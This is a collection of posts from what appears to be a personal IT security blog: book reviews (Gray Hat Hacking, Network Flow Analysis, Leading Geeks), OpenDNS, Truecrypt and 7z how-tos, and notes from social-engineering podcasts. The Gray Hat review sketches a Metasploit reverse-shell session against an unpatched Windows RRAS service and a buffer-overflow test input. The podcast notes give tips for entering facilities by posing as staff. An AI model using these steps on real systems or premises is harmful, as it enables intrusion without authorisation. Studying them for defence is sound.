Gray hat hacking: The ethical hacker's handbook - Book review

The following is a brief [and biased] review of Gray Hat Hacking (2nd edition, 2007). In one sentence: I would borrow the book from a library to read it. Alternatively, I would buy it, read it and sell it afterwards.

Disclaimer: These lines are no substitute for reading the book. They are meant to provide a global overview of what the reader can find in it. My kudos to the authors; writing a book is always a big effort, and an even greater one when the book deals with a moving target such as IT security / software analysis.


The book: Gray hat hacking: The ethical hacker's handbook.
The authors: Shon Harris, Allen Harper, Chris Eagle, Jonathan Ness.
Publication year: 2007 - Second edition.
Publisher: McGraw-Hill.



chapter 1 ethics of ethical hacking
A very generic chapter, useful to read through to set the global scene, and handy if you need to justify work in IT security. It is well structured and referenced; see for example page 10 on the origin of the words hacker and ethical hacker. There are clear statements such as "security does not like complexity" [although, I would add, we live in a complex world].

chapter 2 ethical hacking and the legal system
A summary of US laws related to IT security, for example the US federal computer crime statutes and some acts such as:
18 USC 1029, 18 USC 1030, 18 USC 2510, 18 USC 2701, the Digital Millennium Copyright Act and the Cyber Security Enhancement Act.

chapter 3 proper and ethical disclosure
A helicopter overview of ethical disclosure. They mention the Month of PHP/Browser Bugs, the story of Michael Lynn and Cisco, and refer to the CERT/CC vulnerability disclosure process of 45 days, together with the Organization for Internet Safety and the Zero Day Initiative (by TippingPoint, owned by 3Com).

chapter 4 metasploit
Learning how to use Metasploit is a nice way to launch an exploit and own a box. They provide a thorough description of the console and the auxiliary modules. They start with a simple example, an unpatched Windows XP Service Pack 1 machine missing the RRAS security update, first covering the basic commands:

show
info
use
help
show options
set RHOST ipaddress
show payloads
set PAYLOAD payload-name
show options
show targets
set TARGET 1
exploit
info
show auxiliary
use option
show options
sessions -l
sessions -i number

and, second, exploiting client-side vulnerabilities (browsers, email apps, media players, client software in general) with Metasploit.
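To give a flavour of how the commands in that list chain together, here is a rough sketch of a console session against that kind of target (my own reconstruction, not copied from the book; the RRAS module path and the payload name are quoted from memory and may differ in your Metasploit version):

msf > use exploit/windows/smb/ms06_025_rras
msf > show options
msf > set RHOST 192.168.1.20
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST 192.168.1.10
msf > show targets
msf > set TARGET 1
msf > exploit

RHOST points to the victim machine and LHOST to the attacking machine where the reverse shell will connect back.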

A useful hint: to return to the Metasploit console prompt we can use ctrl-z.
I would also highlight a curious comment: they mention that, through client-side exploits, you can attack workstations protected by a firewall.

I find the description they provide of Meterpreter very interesting: a payload injected into the memory of the exploited process that acts as a command interpreter.
Meterpreter has core commands, file system commands, networking commands, system commands and user interface commands, even making it possible to migrate from one process to another.

They conclude this chapter with the use of Metasploit as a man-in-the-middle password stealer, configuring it as a malicious SMB server. They also briefly touch on Cain (the password-stealing tool), refer to the link with nmap or Nessus through db_autopwn, and provide a brief description of what is inside a Metasploit module.

chapter 5 - using backtrack
They talk about BackTrack 2. This chapter shows how quickly things move in the security arena: their points on the usefulness of ISO Recorder and on how to make changes to the distribution persistent are now somewhat outdated.

Part 2 of the book is called "penetration testing and tools" - the name is a little bit misleading.

chapter 6 programming survival skills
What I took with me: the year 1972, when Dennis Ritchie invented C, and the fact that Intel processors are little endian while Motorola processors are big endian, plus some memory-related concepts (see the quick check with the size command right after this list):

- bss section ("below the stack section"): stores global non-initialised variables; its size is fixed at runtime
- heap section: stores dynamically allocated variables and grows from lower-addressed memory towards higher-addressed memory; allocation is controlled through the malloc() and free() functions
- stack section: used to keep track of function calls; it grows from higher-addressed memory towards lower-addressed memory, and local variables live here
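A quick way to see those sections in a real ELF binary is the size utility from GNU binutils (my own aside, not from the book); it prints the section sizes of any program, for example:

$ size /bin/ls

The output columns show the text (code), data (initialised globals) and bss (uninitialised globals) sizes in bytes.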

[I think there is a typo on page 131: a 5 should be an index variable]

I also read that AT&T assembly syntax is normally used in Linux, while NASM (Intel syntax) is used by many Windows assemblers and debuggers.

The chapter ends with assembly and Python. Python objects are data types such as strings, numbers, lists, dictionaries and files; dictionaries are similar to lists, but their objects are referenced by a key. I like the Python part - easy and to the point.

chapter 7 basic linux exploits
You can read that the stack is FILO (first in, last out) and some points on the importance of address space layout randomisation. I also took with me that Perl is interpreted [e.g. perl -e 'print "A" x 600'; see the little sketch after the list below] and that Python is an interpreted, object-oriented language.

They mention sticky bits and the fact that shellcode is actually binary. They keep providing valuable input regarding memory:

- the environment and arguments are stored in an area above the stack
- eip points to the next instruction to be executed
- in Metasploit we can find the locations of opcodes with msfelfscan
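Tying the perl one-liner above to an actual overflow attempt, a minimal sketch (assuming a locally compiled, vulnerable test program called ./vuln that copies its first argument into a small stack buffer):

$ ./vuln $(perl -e 'print "A" x 600')

If 600 bytes are enough to overrun the buffer and overwrite the saved return address, the program should crash with a segmentation fault, which is the usual starting point for the exploits described in these chapters.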

chapter 8 advanced linux exploits
This chapter shows how to calculate the locations to overwrite in the heap with buffer overflow exploits, and how these techniques require time and effort. They explore the Windows debugger - from page 250 - and make some points on OllyDbg on page 255. An important point: OllyDbg only works in user space; for kernel space we need another debugger such as WinDbg. They end by briefly mentioning the Metasploit opcode database.

chapter 9 shellcode strategies
This is a very verbose and theoretical chapter. They include the use of gdb (debugger) and gcc (compiler) and mention the important role of objdump in extracting the shellcode bytes.

chapter 10 writing linux shellcode
Interesting tips: the use of nasm -f elf and ld -o. I also think there is a typo on page 231.
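Putting those commands together with the objdump role mentioned in the previous chapter, a minimal sketch of the usual Linux shellcode workflow (assuming an assembly source file called shellcode.asm):

$ nasm -f elf shellcode.asm      # assemble into an ELF object file (shellcode.o)
$ ld -o shellcode shellcode.o    # link it into an executable
$ objdump -d shellcode           # disassemble it to read out the opcode bytes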

chapter 11 basic windows exploits
This chapter states that Linux and Windows are driven by the same assembly language (on the same processor family). The Microsoft C/C++ optimizing compiler and linker, cl.exe, is touched upon, together with the cdb, ntsd and windbg debuggers.

chapter 12 basic passive analysis
The text now turns to source code audit tools such as ITS4, RATS, Flawfinder and Splint, and a decompiler for Java named JReversePro, stressing the importance of checking all user-supplied data.

Code analysis tools mentioned in this chapter are:

- IDA Pro as a powerful disassembler
- Hex-Rays (an IDA Pro plug-in) as a decompiler
- BinNavi - a graph-based analysis and debugging tool, a binary code reverse engineering tool built to assist vulnerability researchers who look for vulnerabilities in disassembled code

and some other tools like:
- BugScam (an IDA plug-in)
- Chevarista (a static analyser)
- BinDiff (useful to compare original and patched binaries)

chapter 13 advanced static analysis with IDA Pro
This chapter shows us that stripping a binary means removing all symbol information. We can also read that, to learn which dynamic libraries an executable depends on, we can use dumpbin on Windows, ldd on Linux and otool on Mac OS X (see the one-liner right after the list below). Additionally, this chapter also mentions:
- the fast library acquisition for identification and recognition (flair)
- the use of pelf and sigmake
- how to perform a manual load of program headers
- IDA's scripting language, IDC
- IDA plug-ins
- and finally, a brief reference to IDA Pro loaders and processor modules
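On the dynamic-library point above, a one-line check on Linux (my own illustration, not from the book):

$ ldd /bin/ls      # lists the shared libraries /bin/ls depends on

dumpbin /dependents does the equivalent on Windows, and otool -L on Mac OS X.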

chapter 14 advanced reverse engineering
This chapter starts with a nice statement: what software developers call stress testing is what vulnerability researchers call fuzzing. The tools they propose to use are:
- debuggers like gdb
- code coverage tools like process stalker
- profiling tools
- flow analysis tools
- memory-use monitoring tools like valgrind, a memory debugging and profiling system
- and finally, fuzzers like SPIKE

chapter 15 client side browser exploits
This chapter mentions the concept of spear phishing (APT or targeted attacks are now the trendy names). As fuzzing tools, they propose:
- mangleme from freshmeat.net
- axfuzz and axenum - to check appearances of install, writeregval, runcmd, gethostname, rebootmachine
- AxMan and Internetexploiter
As a little detail, they use something called the "mark of the web" to make Internet Explorer behave as if we were browsing in the Internet zone.

chapter 16 exploiting Windows access control model for local elevation of privileges
These pages talk about SIDs and access tokens, access control entries, system ACLs and discretionary ACLs, while using some of the not-so-popular Sysinternals tools.

chapter 17 intelligent fuzzing with Sulley
This chapter refers to the importance of protocol analysis for effective fuzzing. For that, they propose the use of the Sulley fuzzing framework.

chapter 18 from vulnerability to exploit
As the title indicates, this chapter covers the steps necessary to construct payloads (and the need to gain control of eip, the instruction pointer).

chapter 19 closing the holes: mitigation
Three concepts are described and discussed in this chapter: patching, binary mutation and third party patching.

chapter 20 collecting malware and initial analysis
They talk about malware and honeypots, the possibilities for avoiding VM detection and the usefulness of honeyd and nepenthes. Tools proposed in this chapter for malware analysis are PEiD, UPX, strings, regshot, filemon, process explorer, process monitor (they don't mention this one but I do, together with the CaptureBAT log viewer), Norman SandBox and MAP (the Malcode Analyst Pack) from iDefense.

chapter 21 hacking malware
Yet more content on unpacking, using PEiD, LordPE and IDA and OllyDbg plug-ins, plus additional content on malware analysis.

Happy gray hat reading!

Public DNS servers: Less privacy in exchange for a security layer

There are several free public DNS servers on the Internet; Google, Scrubit and DNSadvantage are some of them. OpenDNS is the one I have selected to test on Ubuntu for a while. They offer web content filtering and basic protection against known phishing sites, botnets and some known worms.


Inserting the OpenDNS name servers into /etc/resolv.conf is an easy task: their addresses are 208.67.222.222 and 208.67.220.220. If you are using DHCP, add those name servers, separated by a comma, to the file /etc/dhcp3/dhclient.conf, using the following line:
prepend domain-name-servers 208.67.222.222,208.67.220.220;
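A quick way to check that the OpenDNS resolvers are actually answering your queries (a small aside of mine: myip.opendns.com is a special OpenDNS record that returns your own public IP address when resolved through their servers):

$ dig +short myip.opendns.com @208.67.222.222

If OpenDNS is reachable, this command prints your public IP address.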

There are, however, some additional steps to take if our ISP assigns us a dynamic public IP address. OpenDNS provides a simple utility for those using MS Windows or Mac OS. In Linux, we have to follow these steps. After visiting several sites that cover this scenario (e.g. the Ubuntu docs or the ddclient site), I summarise only the steps that actually worked:
0. Sign in to the OpenDNS site, create your network and configure your security and content filtering settings.
1. Install ddclient e.g. in Ubuntu
$ sudo apt-get install ddclient
2. Configure the file /etc/ddclient.conf in this manner
ssl=yes
daemon=300
protocol=dyndns2
use=web
server=updates.opendns.com
login=yourlogin
password=yourpassword
yournetworknameintheopendnssite


3. If there is a /var/cache/ddclient/ddclient.cache file, erase the "ip=" segment [although you can skip this step]

4. Now it is advisable to
4.1 Test ddclient using the command line
$ sudo ddclient -daemon=0 -noquiet -debug
4.2 Start the daemon at boot up by writing in the file /etc/rc.local the line
/usr/sbin/ddclient -daemon 300 -syslog
before exit 0.

5. The ddclient daemon can be stopped with
sudo killall ddclient
or started with
sudo /etc/rc.local

And ready to surf! Now OpenDNS will see all the sites you visit (a privacy loss). However, that was already the case with your ISP's name service.

These "secure" name servers can constitute an additional security layer for home browsers, provided that they require a naming service. However, if they type an IP address directly (or a trojan within their box), then there is no additional security layer. Sites like this one can provide the IP address of a site directly.

A little final note: these OpenDNS services, web filtering and basic phishing protection, take around 5 minutes to pick up a new IP address. Take that into account: after an IP change, the first 5 minutes of browsing will be "unprotected" web surfing.

Happy name resolution! (and happy to read your comments)

Little addendum triggered by a cunning comment from a committed reader: an alternative to these public DNS servers is running your own DNS server, configured to obtain names from the Internet root name servers. Certainly a better alternative from a security standpoint. However, this option is only viable for those IT-savvy individuals with sufficient skills, and resources, to run their own name service.
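For the record, a minimal sketch of that do-it-yourself option on Ubuntu (an assumption of mine, not part of the reader's comment: the stock bind9 package ships configured as a recursive caching resolver that works down from the root servers):

$ sudo apt-get install bind9
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf    # point the system at its own resolver

After that, name resolution no longer depends on OpenDNS or on your ISP's name servers.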

Network Flow analysis by Michael W. Lucas - Book review

Management schools teach you that someone or something is effective if they do the right things and efficient if they do the things right. The book "Network Flow Analysis" by Michael W. Lucas (published by No Starch Press and available on Amazon) is effective, it shows the things you need to know about netflows, and efficient, it has the right lightweight format, although at times I missed some explanatory drawings for those who learn visually.



The book is divided into an introduction and 9 chapters. Michael first explains the reason for the book in the intro, and the difference between what network management tools give the network expert and what working with network flows can provide.

I then started the book with chapter 1, where I really appreciated that the flow system architecture comes right after the definition of a network flow. This avoids confusion and saves time for the reader. Actually, this theme of saving the reader time and leading them to the point is a constant throughout the entire book. As a little suggestion, I would have added in this chapter a small disclaimer stating that some TCP/IP networking concepts should already be known by the reader (well, actually, most readers will surely be network specialists).

Chapter 2 is the howto 101 for installing and starting to operate network sensors and collectors using the free flow-tools available on Google Code. As a side note, I really liked seeing real command lines in the book. This is the reason why I will keep the book close to my machine; it can really be used as a basic manual to install softflowd as a software-based network flow sensor and flow-capture as a flow collector. In addition to this, it was good to be reminded that the -arp switch in ifconfig enables a network interface without participating in ARP.

Chapter 3 introduces the use of flow-cat and flow-print to view flows. In this chapter the junior network admin starts realising the potential value of net flows. My only "but" for this entire chapter is the reference to hexadecimal output. For future editions, I would propose highlighting and inserting a little explanation where flow-print -f 0 is discussed, since it adds interface numbers and prints port and protocol information in hex.

Once the foundations have been laid out, chapter 4 refers to real life aspects of net flows such as filtering. For that, Michael proposes the use of flow-nfilter, building filters out of primitives, knowing that each primitive can only include one type of match. The bonus point for this chapter would be a nice little diagram showing how primitives relate to filters.

Chapter 5 follows the logical thread started by chapter 4: after filtering comes reporting. Actually, this is also a constant feature in this book: the reader never gets lost, and it is easy to understand and follow the proposed script along the pages of the book. We learn how to use flow-cat in combination with flow-report and, later on, with flow-nfilter. This is one of the strong points of Michael's book. Smart network admins will surely come back to chapters 5 (and 6) regularly in their daily work.
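As a flavour of what these chapters cover, a minimal pipeline of my own (not taken from the book; the file and filter names are made up, and the filter "only-dns" would have to be defined in filters.cfg):

$ flow-cat /var/flows/2010-10-01.* | flow-nfilter -f filters.cfg -F only-dns | flow-print

flow-cat concatenates the raw flow files, flow-nfilter keeps only the flows matching the named filter, and flow-print displays them.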

Chapter 6, at first glance, can be seen as hard core: Perl comes into the picture! However, Michael effectively guides readers through the jungle of installing Cflow.pm so that FlowScan can work, while mentioning useful tools such as flowdumper, a tool that shows everything in the flow record. This chapter also mentions the difference between FlowScan and CUFlow.

Chapter 7 presents a collection of three tools: FlowViewer, FlowGrapher and FlowTracker. The first one is a web interface for flow-print and flow-nfilter, optimal mainly for network admins. The second one graphs arbitrary flow data and the third one generates RRD graphs based on flow data. This chapter introduces these tools and provides a basic manual, enough to start playing with them. Probably chapters 7 and 8 could trigger an entire new book on visualising net flows.

Chapter 8 is the step-by-step basic manual for gnuplot, the generic graphical representation tool in Linux, on this occasion applied to network flow data; but in itself, this chapter is a useful guide for anyone willing to start off "the gnuplot experience".
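To give a taste, a one-liner of my own (not from the book), assuming a plain two-column data file called flows.dat with timestamps and byte counts:

$ gnuplot -persist -e "plot 'flows.dat' using 1:2 with lines"

The -persist switch keeps the plot window open after gnuplot exits.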

Chapter 9 belongs to the "swiss army knife" subset of this book (together with chapters 5 and 6). Once everything is installed, implemented and running, what do we do with it? Well, this chapter answers that question in a very practical way.

I have released a series of tweets (http://twitter.com/itsecuriteer) with a small number of valuable pearls coming out of reading this effective book. All in all, I agree with Mr. Bejtlich's comments about the book (see http://taosecurity.blogspot.com/2010/08/consider-reading-network-flow-analysis.html): a five-star book on network flows.

Finally, a little piece of advice: please read the afterword on page 189, where the author refers to key non-technical skills that all admins should have (and practise ;-)

Happy October reading!

Truecrypt and USB drives

Human beings lose things. Laptops, smartphones and USB memory drives are things. We also lose them (see e.g. this piece of news). The data that any IT-related hardware item can carry is often more valuable than the hardware itself. Truecrypt is a valid option for encrypting "losable" devices. This way, a third party would have a harder time reaching data stored e.g. on a USB memory drive.




Truecrypt exists for Linux, Mac OS and MS Windows (where there is also a portable version, which, however, requires local admin rights). Once it is installed, its GUI looks like this:


It can use either a file or an entire partition as the encrypted container. Both options can be mounted in the system, and all data stored there will be encrypted at rest. The symmetric encryption algorithms that Truecrypt can use are the following. Balancing speed and cryptographic strength, AES is the recommendable option:


However, remember that the security of your container relies not only on the strength of the encryption algorithm used, but also on the strength of the password used as the authenticating credential. The tool also allows the use, together with a strong password, of a keyfile, so that both elements are required to decrypt and use the container (if there is the need to base authenticating credentials not only on something you know, but also on something you have).

Little note: if you need to encrypt a set of already existing files, then you first need to create an empty container and afterwards move the files into it.
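For Linux users who prefer the command line, a rough sketch using Truecrypt's text mode (the flags are quoted from memory and may differ between versions, so double-check them against truecrypt --help):

$ truecrypt -t -c                        # interactive wizard to create a new encrypted container
$ truecrypt -t secret.tc /mnt/secret     # mount the container on /mnt/secret
$ truecrypt -d secret.tc                 # dismount it when finished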



Final catch: the drawback of using Truecrypt to encrypt your USB memory drive is that you need Truecrypt available wherever you use your files. The advantage: if your USB memory drive is lost, your data will be safer. It is up to your risk management decision ;-).

Happy secure data transport!





Free of charge web-based photo geo-location - Exif data cleaning

Digital photo files contain exif data. Typical items within exif data are camera model, date and time of the picture, and, if taken with a GPS-enabled device, also the GPS coordinates where the photo was taken. If that is the case, how can we geo-locate a picture?

The Exif Firefox Add-on is an easy way to read exif data. Once you have access to the GPS coordinates, the process is easy. Here are the steps to geo-locate a photo free of charge (and web-based):

From GPS coordinates to a real physical location:
- Go to tomtom routes and add the GPS coordinates as shown below,
For the reverse process, from a real physical location to GPS coordinates:
- Go to gpscoordinates.eu and enter the physical location as shown below,

A quick way to delete exif data from your pictures is to open them with GIMP, the GNU Image Manipulation Program, and save them again, unticking the advanced option "save EXIF data".
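If you prefer the command line, exiftool can do the same job (my own addition, assuming the exiftool package is installed):

$ exiftool -gps:all= photo.jpg     # remove only the GPS tags
$ exiftool -all= photo.jpg         # remove all exif metadata (a photo.jpg_original backup is kept)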

Happy geo-location!


Sound in Ubuntu 10.04 - Security videos and podcasts

Willing to enjoy security videos or podcasts such as the following ones?

Videos
- irongeek
- owasp
- schmoocon

Podcasts
- pauldotcom
- risky business
- eurotrash
- social engineer

... and, for whatever reason, your new installation of Ubuntu 10.04 does not provide you with sound in your laptop or desktop? Try this one:

user@machine:~$ sudo apt-get install gnome-alsamixer

user@machine:~$ gnome-alsamixer

This ALSA-related sound app offers you a way, usually successful, to control your speakers and microphone in an easy manner. Pay special attention to the PCM control.

Happy listening!

By the way, does your machine enter power-saving mode while you watch security videos? That is annoying. Try caffeine, a little Python app.



Itsecuriteer on Twitter

Starting IT security and IT tweets here
Happy following ;-)

Decrypting AES-encrypted zip files

7-Zip, available here with a GNU LGPL license, is capable of encrypting and decrypting with AES while compressing and decompressing files.
Once you install 7z on a Linux box (e.g. with the command line $ sudo apt-get install p7zip-full), the entire documentation on how to use the tool can be found locally in the path
/usr/share/doc/p7zip-full/DOCS/MANUAL/index.htm .

Some examples of command lines:

- to decrypt (you will be prompted for the password) and extract all .doc files from a zip file, recursively:
$ 7z e Zipfilename *.doc -r
- to create an encrypted zip file (or to add to an existing one):
$ 7z a Zipfilename -ppassword file.tozip
- to extract an encrypted zip file:
$ 7z x Zipfilename -ppassword

Happy 7z use!

Security Bloggers Network

Dear readers,
This blog is now reachable from the security bloggers network. If you go to their site, the link appears on the right hand side, in the list of contributors.
Thanks to Alan Shimel, Chief Executive Officer of The CISO Group.


IT Security Management book


IT Security Management
How to set up an IT Security function

After long months and long hours of research, writing and editorial work, there is a new book I recommend on the topic of IT Security Management and how to create, grow and develop an IT security team while providing business value.

There is an extensive bibliography delving into the field of IT Security, from very technical aspects to information governance. However, there are not so many titles with both a technical and a human vision on how to create an IT security team, a team of IT Securiteers.

It is published by Springer within their Lecture Notes in Electrical Engineering series. This book is a key component for building the syllabus of a Master's degree in Information Security or IT Security Engineering.

Its title is "IT Securiteers: How to set up an IT Security function".

You can find it, together with a brief intro, in the publisher's site - Springer - and in Amazon, among other sites.

Happy reading!
(And certainly, if you have any comment on the content, feel free to drop it here!)

You can also "follow the book" in twitter @itsecuriteer.


The following words come from the publisher's site:

IT securiteers - The human and technical dimension working for the organisation

Current corporate governance regulations and international standards lead many organisations, big and small, to the creation of an information technology (IT) security function in their organisational chart or to the acquisition of services from the IT security industry. More often than desired, these teams are only useful for companies’ executives to tick the corresponding box in a certification process, be it ISO, ITIL, PCI, etc. Many IT security teams do not provide business value to their company. They fail to really protect the organisation from the increasing number of threats targeting its information systems. IT Security Management provides an insight into how to create and grow a team of passionate IT security professionals. We will call them “securiteers”. They will add value to the business, improving the information security stance of organisations.

Social engineering lecture by Kevin Hogan

Episode number 9 of the Social-Engineer podcast features an interview with the author and body language expert Kevin Hogan. Among other books, he has written "The Psychology of Persuasion". This is a post with learning points extracted from his words on persuasion. Here they are (most of them are close-to-literal, or slightly summarised, statements from Mr. Hogan):

Minute 17: Let's try to use the right words. Emotions are attached to words. Hearing certain words (e.g. terrorist, malware) unconsciously triggers the release of cortisol and adrenaline in our brains.

Minute 22: "When people smile too much ...[]... we put a question mark".

Minute 23: Keep yourself a handshake's distance away in face to face communications (for liking and acceptance). A smaller distance calls for a negative answer from our counterpart. People tend to have an affinity for mirroring (e.g. same first name, same voice, same clothes): "The reason why I know he is a genius is because he thinks like I do" (min 25).

Minute 24: "Women really pay attention to shoes ...[]... women are really discriminative about men in general".

Minute 25: Identifying badges. If you want to pass unnoticed, leave all necklaces and unique accessories at home. And the opposite, if you want to be remembered, show that unique tattoo you have.

... for right-handed people... (for lefties, the sides mentioned will be the opposite)

Minute 26: Right-hand handshakes. In general, when you look up to the right, the left brain hemisphere is more active. And this side is more logical and sequential.

Minute 27: The right part of our brain is mostly biographical (and unconscious), full of unpleasant memories. Not recommendable to be highly active when we first know someone.

Minute 29: If you want to make a good impression, sit close to the tidiest side of the desk, which, for right-handed people, is usually the right side. Avoid the chaotic side of the table.

Minute 33: Sit down at ease and look with your eyes to the right. No problem! Look now to your left. Do you feel like ending with that look? And do you notice fear, sadness, anger?

Minute 36: Left and right. Generic statement: If you put your earphone on your left ear, you will have a more emotional conversation than if you place it on your right ear.

Minute 39: Microexpressions. Do not force a smile, they will all discover it. A phony smile creates discomfort (min 42).

Minute 42: Human beings look for symmetry. "Symmetry is easy to fake... by keeping your lips slightly apart". Keep this posture in photographs.

Minute 46: A look of curiosity opens more doors than a smile.

Minute 50: "Men are territorial". If a man sits close to a woman for longer than 5 minutes, he becomes her protector.

Minute 55-57: Access any facility by appearing to belong to it. "When trying to enter any facility, a cleaning man with a mop and a bucket is never stopped ...[]... or carrying the internal magazine ...[]... or carrying a company box ...[]... or asking for John".

Minute 57: "If you look angry, nobody would stop you [at the entrance]".

Minute 60-61: "Most people are in auto-pilot within their role". Keep them in auto-pilot within their role and your social engineer compromise would work. Do not raise any flag.

Minute 64: Most people would like to keep feeling comfortable in their roles.

Minute 65: Reading an email. 50% of the content of any email you send is already on the mind of the reader. Emoticons could create a nice initial context.

Minute 67: "People are terrible at understanding risks".

Minute 69: If you need to obtain information, rather than asking "how are you?", ask "what are you up to?".

Minute 72: The more real something looks, the more tangible and credible it seems, e.g. a testimonial with a real name says much more than an anonymous testimonial.

Thanks to Mr. Hogan and to the social-engineer.org crew again!




Social engineering lecture by Dr. Ellen Langer (Harvard University) - Part II - Learning conditionally

Episode number 7 of the Social-Engineer podcast features an interview with Harvard psychologist Dr. Ellen Langer. This is a second post with learning points extracted from her words on mindfulness. Here they are (most of them are literal, or slightly summarised, statements from Ms. Langer):

Minute 20: Expectations. Someone published a newspaper ad asking for a 1 USD banknote. He made a lot of money: many people just sent the dollar, expecting something nice in return. Actually, our brain is wired to expect that.

Minute 21: There is nothing better to provoke rejection than stating: " What you have to do is..." We do not like to be told what we have to do. However, we welcome requests.

Minute 22: The foundations of manipulation rest on offering a choice to the interlocutor. The manipulator's task will be to guide them through the choice. E.g. "[adapted]...If you would like your child to have eggs for breakfast, just ask her how she would like the eggs, not whether she would like to have eggs for breakfast".

Minute 23: A second opinion does not matter very much. We associate the word second with something less important.

Minute 25: If you need 20 minutes from someone who is really busy, start asking something along these lines: "Could you devote me two hours this afternoon?" They will answer "No way". And then you introduce your real request: "What about you give me 20 minutes?".

Minute 28: The question determines the answer. Compare these two questions:
- Why am I a failure?
- Why am I a success?

Minute 29: Another example of framing, look at these two sentences:
- You are wonderfully spontaneous.
- You are terribly impulsive.
We refer to a similar reality but within different frames. People always try to confirm their hypotheses.

Minute 35: The role of people in messages, especially in messages asking NOT to do something. Two cases:
- Keep off the grass.
- Ellen says keep off the grass.
We tend to follow de-personalised messages (first case) more than personalised messages (second case).

Minute 37: (Almost) everything we experience is the result of a previous decision. Once the decision is made, most of those decisions are accepted mindlessly.

Minute 39: Mindlessness maintains the "status quo".

Minute 45: Information has no single understanding. This statement can be applied to fight against stress. Stress is a way to understand reality.

Minute 47: Learning conditionally: "This could be a table rather than this IS a table".

As mentioned already in part 1, this content is excellent - thanks to Ms. Langer and to the social-engineer.org crew!

Social engineering lecture by Dr. Ellen Langer (Harvard University) - Part I

Episode number 7 of the Social-Engineer podcast features an interview with Harvard psychologist Dr. Ellen Langer. I have noted down some learning points extracted from her words on mindfulness. Here are the first ones:

Minute 10 - More than 50% of current attacks on information systems are carried out through social engineering (from the social-engineer crew).

Minute 12 - Most of us, most of the time, are not consciously "present", in a state of "mindlessness", i.e. we set our brain in a kind of automatic pilot.

Minute 13 - The value of "empty requests" and the power of the word "because".

If we go to an office and ask the question... may I use the photocopier? We will get a less positive answer than if we use the following question: May I use the photocopier to make some copies?

Minute 14 - By using common "cultural switches", such as ...may I use the photocopier to make some copies?.. communication emitters tend to produce in communication recipients exactly the "typical or common answer".

Applied to social engineering, this means that the social engineer needs to engage the victim into a "common and known routine".

Minute 15 - "When we are not there, we are not there to realise that we are not there" - A game of words to define mindlessness.

Minute 16 - An example of "mindlessness". Try this game: Ask someone next to you to add these numbers. Tell the numbers one by one...

- one thousand
- forty ... and she will reply 1040

- one thousand ... and she will reply 2040
- thirty ...and she will reply 2070

- one thousand ...and she will reply 3070
- twenty ...and she will reply 3090

- one thousand ...and she will reply 4090
- ten ...and she will reply...
... 5000 or 4100?




"When there is something familiar, we respond typically in a mindless way. The reason we do this is because we overwhelmingly seek certainty and certainly leads to mindlessness (...) We should be learning in a more conditional way" (Ms. Langer)

Thanks to the social-engineer.org site for this great podcast!

Happy April!

Process explorer vs process hacker

I have been playing with process explorer and with process hacker. I initially wanted to select the better of the two, but I finally decided to keep and use both to identify running processes (and compromised workstations). Why?

- Both tools are useful pilot-light-like tools for your MS Windows XP or 7 computers: they provide useful information on which processes are running in real time on the machine.

- Both tools help identify what a specific process does on the machine. They complement each other.




In process hacker:

- You can inject your own DLLs into a running process.
- The network and services tabs, in the main panel, help oversee all existing network connections and services.
- You have access to all tokens related to a process and to all registry keys in use (also available in process explorer through the lower pane).
- There is even more process-related information than in process explorer.
- You can create your own service and look for hidden processes.
- You don't need to install .NET on your machine (since version 2).
- There is a portable app version.

But...
- You need(ed) to install .NET on your machine. [Well, not any more - thanks to Mantas for the comment]

In process explorer:

- In the process properties option, you can run a strings command on the process (useful to identify specific pieces of code). You can also do this in process hacker, but it is a little more hidden, under the memory tab - search string.
- The "find process" functionality is really handy. Just drag the target icon onto the window you are wondering about and it identifies the owning process.
- There is also a portable app version.
- Less functionality sometimes means more clarity.


But...
- You have access to network information per process, but not in the main panel.

All in all, I am happy to be corrected, but I would say that process hacker provides everything that process explorer brings, plus an additional set of goodies.

Happy March!

ps By the way, a little note for the readers of this blog: if you are a passionate IT security professional, able to work in English and willing to relocate to Central Europe for some months while adding undeniable technical infosec value to your CV, please contact me (an email address always appears on this blog's main page).

Book review: "Leading geeks" by Paul Glen

I have just read the book by Paul Glen titled "Leading Geeks". Following the spirit of expert book review sites, such as the one from Mr. Bejtlich, here are some comments about "Leading Geeks".

The subtitle of the book is "How to manage and lead people who deliver technology". It has been published by Wiley.

First things first, this review by no means replaces the reading of the book. On the contrary, I hope that by reading these lines, this book would have more readers. You can buy it, for example, here.

I summarise my view on this book by saying that it is a book worth reading, although the first half contains more aha! thoughts than the second half.

Mr. Glen starts with an interesting comparison between power and leadership. He defines leadership as "a special type of power relationship in which both leaders and followers are mutually influential for their mutual benefit".

I understand that his definition of a geek is someone who works with technology. He continues with a splendid series of sentences: "...for a geek, to reason is to know, to know is to be certain, to be certain is to be right, and to be right is to be safe" (page 28). I like it when Mr. Glen mentions that geeks use the "problem-solution" model (page 29) as a tool to tackle almost any situation. This already constitutes a first difficult point for geek managers (page 124): they need to perform some activities, such as facilitation and information sharing, that do not fit the problem-solution model.

He also refers to the fact that geeks are not obliged to sharpen their social skills. Most of the value they deliver comes from actions that are not related to behaviour (page 13). This is an important point that we, geeks, have to bear in mind (and improve).

"Geeks think self-expression is communication". You can read this on page 34. I invite you to reflect on this sentence and how current education systems promote this fact. Also an interesting point is the fact that most unprofessional behaviour happens when people are under pressure (adapted from page 134).

The author states that geeks judge colleagues in a swift and merciless manner. I doubt whether I entirely agree with this, but I certainly have this in mind when I hear some judgements around me coming from geeks.

I certainly agree with the statement that we, geeks, pay more attention to the way a system works than to what a system does (page 39).

Page 62 of the book also shows a critical difference between geek and managerial work: the former requires no interruptions, while the latter is mostly based on interruptions. This is then a second difficult point for geek managers: they need to change their daily way of operating.

On page 76, the author proposes 12 competencies for geeks or geek managers. It is interesting to note how the need to manage ambiguity and time horizons is part of that list of competencies.

Especially interesting is his definition of politics (page 86): "The process by which a group of people makes a decision". I link this, first, with the recommendation the author makes to provide clarity to the environment (page 174), so that geeks are able to understand what they work for. And second, I link it with how a decentralised way of making decisions requires information sharing (adapted from page 173).

All in all, I enjoyed reading the book. I could take several thoughts and models for daily professional geek work.

If there is an IT or IT security related book you would like a review about, please leave the name in a comment and I will endeavour to read it.

Thanks to Paul Glen for his enlightening book.

Increasing online availability levels

Confidentiality, Integrity and Availability: the CIA acronym is always present in information security. They are the three key security properties of any piece of information.

This post focuses on increasing availability in a specific scenario: we need to access the Internet and we do not trust our computer's hard disk (maybe it is infected with a piece of malware, maybe there is a keylogger already installed...).

Ubuntu releases (e.g. 8.10, 9.04 and 9.10) provide the possibility to create a Startup USB drive with some persistent space to store configuration settings and documents.

